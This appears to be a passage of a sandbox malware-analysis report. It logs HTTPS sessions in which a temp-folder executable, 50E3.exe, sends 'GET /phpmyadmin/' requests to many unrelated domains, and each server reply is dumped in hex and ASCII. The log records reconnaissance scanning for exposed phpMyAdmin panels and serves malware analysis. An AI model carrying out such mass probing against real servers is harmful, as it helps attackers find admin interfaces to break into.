2023-11-30 10:22:38 UTC	497	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6b 74 48 7a 77 4b 54 33 4e 37 43 52 69 67 6f 71 65 30 42 56 50 62 49 6f 66 78 2f 42 54 56 34 52 75 4a 39 4f 6e 4d 52 47 65 48 74 53 77 5a 63 41 74 55 72 7a 39 37 4d 30 55 41 54 6f 75 64 79 75 69 63 50 72 69 64 76 32 53 52 37 58 43 48 6e 46 39 49 38 53 44 67 3d Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ktHzwKT3N7CRigoqe0BVPbIofx/BTV4RuJ9OnMRGeHtSwZcAtUrz97M0UAToudyuicPridv2SR7XCHnF9I8SDg=
2023-11-30 10:22:38 UTC	512	IN	Data Raw: 7a 46 6e 6e 41 41 41 41 41 45 6c 46 54 6b 53 75 51 6d 43 43 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 70 61 72 6b 20 3d 20 22 65 79 4a 31 64 57 6c 6b 49 6a 6f 69 4e 54 59 33 5a 54 63 79 4d 6a 51 74 4d 7a 4e 69 59 79 30 30 59 6d 56 6b 4c 54 6b 7a 4f 54 63 74 5a 54 41 78 4f 47 5a 68 4d 6a 45 33 4e 7a 68 6b 49 69 77 69 63 47 46 6e 5a 56 39 30 61 57 31 6c 49 6a 6f 78 4e Data Ascii: zFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNTY3ZTcyMjQtMzNiYy00YmVkLTkzOTctZTAxOGZhMjE3NzhkIiwicGFnZV90aW1lIjoxN

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	52838	145.14.30.248	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:37 UTC	167	OUT	GET /phpmyadmin/ HTTP/1.1 Host: san.ee Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:38 UTC	251	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 33 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 39 34 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 54 75 65 2c 20 32 38 20 4e 6f 76 20 32 30 32 33 20 30 31 3a 31 38 3a 35 39 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 54 61 67 3a 20 22 36 35 36 35 34 30 30 33 2d 31 65 65 22 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 0d 0a Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Thu, 30 Nov 2023 10:22:38 GMTContent-Type: text/htmlContent-Length: 494Last-Modified: Tue, 28 Nov 2023 01:18:59 GMTConnection: closeETag: "65654003-1ee"Cache-Control: no-cacheAccept-Ranges: bytes
2023-11-30 10:22:38 UTC	494	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 68 74 74 70 22 20 6e 61 6d 65 3d 22 68 74 74 70 22 20 76 61 6c 75 65 3d 22 35 30 30 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 68 74 74 70 73 22 20 6e 61 6d 65 3d 22 68 74 74 70 73 22 20 76 61 6c 75 65 3d 22 35 30 30 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 70 72 65 66 65 72 5f 68 74 74 70 73 22 20 6e 61 6d 65 3d 22 70 72 65 66 65 72 5f 68 74 74 70 73 22 20 76 61 6c 75 65 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 3c 2f 62 6f Data Ascii: <!DOCTYPE html><html> <body> <input type="hidden" id="http" name="http" value="5000"> <input type="hidden" id="https" name="https" value="5001"> <input type="hidden" id="prefer_https" name="prefer_https" value="true"> </bo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	52856	15.197.172.60	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:37 UTC	165	OUT	GET /phpmyadmin/ HTTP/1.1 Host: 1.tv Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:38 UTC	764	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 33 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 31 37 37 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 4d 6f 6e 2c 20 31 33 20 4e 6f 76 20 32 30 32 33 20 32 33 3a 33 32 3a 34 36 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 54 61 67 3a 20 22 36 35 35 32 62 32 31 65 2d 34 39 39 22 0d 0a 58 2d 41 64 62 6c 6f 63 6b 2d 4b 65 79 3a 20 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 Data Ascii: HTTP/1.1 200 OKServer: openrestyDate: Thu, 30 Nov 2023 10:22:37 GMTContent-Type: text/htmlContent-Length: 1177Last-Modified: Mon, 13 Nov 2023 23:32:46 GMTConnection: closeETag: "6552b21e-499"X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBA
2023-11-30 10:22:38 UTC	1177	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	52857	3.64.163.50	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:37 UTC	169	OUT	GET /phpmyadmin/ HTTP/1.1 Host: gbya.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:38 UTC	149	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 31 30 20 47 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 33 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 410 GoneServer: openrestyDate: Thu, 30 Nov 2023 10:22:38 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: close
2023-11-30 10:22:38 UTC	134	IN	Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 35 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 67 62 79 61 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 7<html>9 <head>45 <meta http-equiv='refresh' content='0; url=https://gbya.com/' />a </head>8</html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	52850	15.197.172.60	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:37 UTC	165	OUT	GET /phpmyadmin/ HTTP/1.1 Host: 1.tv Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:38 UTC	765	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 33 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 31 37 37 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 4d 6f 6e 2c 20 31 33 20 4e 6f 76 20 32 30 32 33 20 32 33 3a 33 32 3a 32 31 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 45 54 61 67 3a 20 22 36 35 35 32 62 32 30 35 2d 34 39 39 22 0d 0a 58 2d 41 64 62 6c 6f 63 6b 2d 4b 65 79 3a 20 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 Data Ascii: HTTP/1.1 200 OKServer: openrestyDate: Thu, 30 Nov 2023 10:22:38 GMTContent-Type: text/htmlContent-Length: 1177Last-Modified: Mon, 13 Nov 2023 23:32:21 GMTConnection: closeETag: "6552b205-499"X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBA
2023-11-30 10:22:38 UTC	1177	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	52858	216.37.42.12	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:37 UTC	171	OUT	GET /phpmyadmin/ HTTP/1.1 Host: noweco.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:38 UTC	213	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 33 38 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 65 64 3a 20 53 75 6e 2c 20 31 34 20 44 65 63 20 32 30 30 38 20 31 31 3a 31 30 3a 32 38 20 47 4d 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 39 39 37 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundDate: Thu, 30 Nov 2023 10:22:38 GMTServer: ApacheLast-Modified: Sun, 14 Dec 2008 11:10:28 GMTAccept-Ranges: bytesContent-Length: 1997Connection: closeContent-Type: text/html
2023-11-30 10:22:38 UTC	1997	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 47 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 45 43 4f 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 45 72 72 6f 72 20 34 30 30 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><meta name="Generator" content="NOWECO"><meta name="description" content="Error 400"><title>Error 404</title><li

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	52894	213.171.212.244	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:37 UTC	167	OUT	GET /phpmyadmin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:38 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 33 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:22:38 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:22:38 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	52865	67.21.93.254	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:38 UTC	166	OUT	GET /phpmyadmin/ HTTP/1.1 Host: il.cm Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:38 UTC	158	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 33 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 34 36 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 30 Nov 2023 10:22:38 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: close
2023-11-30 10:22:38 UTC	146	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	52896	213.171.212.244	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:38 UTC	167	OUT	GET /phpmyadmin/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:38 UTC	159	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 33 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 30 Nov 2023 10:22:38 GMTContent-Type: text/htmlContent-Length: 162Connection: close
2023-11-30 10:22:38 UTC	162	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	52855	64.190.63.111	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:38 UTC	169	OUT	GET /phpmyadmin/ HTTP/1.1 Host: apee.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:38 UTC	122	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 34 33 39 20 73 74 61 74 75 73 20 63 6f 64 65 20 34 33 39 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 33 38 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 4e 67 69 6e 58 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a Data Ascii: HTTP/1.1 439 status code 439Content-Length: 0Date: Thu, 30 Nov 2023 10:22:38 GMTServer: NginXConnection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	54507	104.238.144.219	443	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
2023-11-30 10:22:38 UTC	170	OUT	GET /phpmyadmin/ HTTP/1.1 Host: nrnet.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-11-30 10:22:38 UTC	803	IN	Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 33 30 20 4e 6f 76 20 32 30 32 33 20 31 30 3a 32 32 3a 33 38 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 33 37 20 28 63 65 6e 74 6f 73 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 6b 20 6d 6f 64 5f 77 73 67 69 2f 34 2e 36 2e 34 20 50 79 74 68 6f 6e 2f 33 2e 36 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 37 2e 34 2e 33 33 0d 0a 45 78 70 69 72 65 73 3a 20 54 68 75 2c 20 31 39 20 4e 6f 76 20 31 39 38 31 20 30 38 3a 35 32 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 31 30 38 30 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 70 68 70 4d 79 41 64 6d 69 6e 5f Data Ascii: HTTP/1.1 200 OKDate: Thu, 30 Nov 2023 10:22:38 GMTServer: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_wsgi/4.6.4 Python/3.6X-Powered-By: PHP/7.4.33Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: private, max-age=10800Set-Cookie: phpMyAdmin_
